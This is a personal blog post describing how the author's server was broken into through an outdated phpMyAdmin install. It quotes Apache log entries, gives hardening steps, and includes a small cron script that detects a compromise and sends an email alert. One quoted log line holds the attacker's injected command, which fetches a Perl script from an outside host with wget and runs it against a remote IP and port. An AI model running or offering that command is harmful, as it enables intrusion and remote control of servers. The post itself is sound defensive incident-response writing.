server hacked

Recently my server was hacked, looking at apache logs, I found weird entries close to hack date (determined through creation date of /var/www/.bash_history file which contained bash-history of nobody user with corresponding hack instructions):

194.2.70.187 – – [17/May/2010:21:26:33 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 511 “-” “-”
194.2.70.187 – – [17/May/2010:21:31:21 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 511 “-” “-“

Such entries appeared many times, with different ip-address. What’s strange it’s that it looks like hacker was looking for a flaw in phpmyadmin, with many attempts to access it:

91.121.9.105 – – [17/May/2010:18:17:24 +0200] “GET /phpmyadmin/config.inc.php?w=uname HTTP/1.1” 200 182 “-” “curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18”
91.121.9.105 – – [17/May/2010:18:17:24 +0200] “GET /phpmyadmin/config.inc.php?q=uname HTTP/1.1” 200 182 “-” “curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18”

Attacks to phpmyadmin were attempted under multiple names: /phpmyadmin, /pma, /phpMyAdmin…

Worst of it, it looks like my server was hacked via phpmyadmin (I must admit it might not have been up-to-date):

188.24.224.56 – – [17/May/2010:23:27:51 +0200] “GET /phpmyadmin/config/config.inc.php?d=cd%20/tmp;wget%20rehashing.ucoz.com/cb.pl;perl%20cb.pl%2085.185.70.251%2017272 HTTP/1.1” 200 419 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3”

This is with this query that hackers downloaded their script…

What have we learned?

  1. try to keep your server up-to-date as much as possible (apt-get dist-upgrade)
  2. to prevent hacks, avoid default names to access popular scripts. In my case, I changed /phpmyadmin url access to a more obscure | less standard name
    1. modify /etc/apache2/conf.d/phpmyadmin.conf and replace /phpmyadmin with a more obscure name (ex: myphpmyadmin)
    2. check apache config: apache2ctl configtest
    3. restart apache: /etc/init.d/apache2 restart

How to detect attacks quickly?

I’ve made a simple script that check for existence of .bash_history file for anonymous user in key locations and send an email alert to further investigate it. I’ve scheduled this script to run daily by putting it into /etc/cron.daily so that next time, I will be able to act quickly if same hack occurs. Here is the script:

#!/bin/sh
# this script tries to detect if server has been compromised looking for .bash_history file for user nobody
# author: Remy Damour
# date: June, 18, 2010

files="/var/www/.bash_history /tmp/.bash_history"

for i in $files
do
if [ -f $i ]; then
current_script=$(readlink -f $0)
creation_date=$(ls -l $i)
bash_content=$(cat $i)
echo "automatic check run by script " $current_script "

[possible hack]
following file was found for anonymous user: " $i"

[hack date] (= file-creation-date)
" $creation_date"

[executed commands]
" $bash_content "

[next steps]
- remove unexpected files found in /tmp (esp. perl scripts with .pl extension)
- run 'ps aux' and kill all processes launched by www-data user
- check apache logs /var/log/apache2/access.log at hack-date to see faulty script" | mail -s "[Alert] Server hacked!" 
fi
done

sources

One Comment Trackback URL | Comments RSS

  1. Nasa Says:

    Very informative!

Post a Comment

Your email is never published nor shared. You're allow to say what you want...